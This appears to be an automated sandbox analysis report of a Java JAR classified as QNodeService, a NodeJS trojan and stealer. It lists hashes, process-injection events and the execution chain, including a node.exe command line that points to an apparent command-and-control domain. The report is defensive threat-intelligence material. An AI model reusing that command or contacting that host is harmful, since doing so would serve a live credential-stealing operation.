qnodeservice | cec468dcecdddadb242dff32e02cb145c79717e70515488fc1d4c80200ee187c

Analysis

Target

e4066dd2044ee697a2cff1c98e2ff663.jar
Size

64KB
MD5

e4066dd2044ee697a2cff1c98e2ff663
SHA1

058449f3d57afcc7584ec41ef118842faef71da5
SHA256

cec468dcecdddadb242dff32e02cb145c79717e70515488fc1d4c80200ee187c
SHA512

c6f0e1bf4a7d7503bd918340f00058f92aa624cb7fcc7d3f988cad7718142cd37f9593346e19c11cb8f9aabe80aa9f96896653ce364d3dbcbca6b5c7dece0c61

Score

10^/10

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
trojan qnodeservice

Executes dropped EXE 1 IoCs

pid	Process
732	node.exe

JavaScript code in executable 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ab9c-174.dat	js

Suspicious behavior: EnumeratesProcesses 4 IoCs

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 504 wrote to memory of 4080	504	java.exe	76
PID 504 wrote to memory of 4080	504	java.exe	76
PID 4080 wrote to memory of 732	4080	javaw.exe	80
PID 4080 wrote to memory of 732	4080	javaw.exe	80

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\e4066dd2044ee697a2cff1c98e2ff663.jar
1⤵
- Suspicious use of WriteProcessMemory
PID:504
- C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
  "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\1d806136.tmp
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4080
- - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
    C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain helpdesk.servebeer.com
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:732

memory/732-175-0x00000266F7440000-0x00000266F7441000-memory.dmp

Filesize
4KB

Download